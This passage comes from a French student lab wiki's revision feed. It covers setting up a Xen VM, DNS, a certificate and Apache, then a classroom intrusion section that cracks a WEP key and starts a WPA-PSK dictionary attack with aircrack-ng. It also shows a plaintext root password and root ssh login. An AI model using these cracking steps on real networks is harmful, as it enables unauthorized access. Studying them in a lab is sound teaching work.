On ouvre notre partition chiffrée avec luksOpen (le nom du volume sera karmeliet_crypted) et on la formatte :&lt;br /&gt;
 cryptsetup luksOpen /dev/sdc karmeliet_crypted&lt;br /&gt;
 mkfs.ext4 /dev/mapper/karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On monte la partition &lt;br /&gt;
 mkdir /mnt/karmelietCrypte&lt;br /&gt;
 mount -t ext4 /dev/mapper/karmeliet_crypted /mnt/karmelietCrypte/ &lt;br /&gt;
&lt;br /&gt;
On y ajoute un fichier texte hello dans lequel on  écrit &amp;quot;cc&amp;quot; puis on démonte la clé et on ferme le volume chiffré&lt;br /&gt;
 umount /mnt/karmelietCrypte&lt;br /&gt;
 cryptsetup luksClose karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On a plus qu'a aller tester notre clé USB en la montant sur l'ordinateur d'un autre binôme et cela nous demande bien de rentrer un mot de passe notre clé est chiffré.&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57099</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57099"/>
				<updated>2021-12-13T18:43:48Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* Serveur apache */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57097</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57097"/>
				<updated>2021-12-13T18:42:42Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* Serveur apache */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
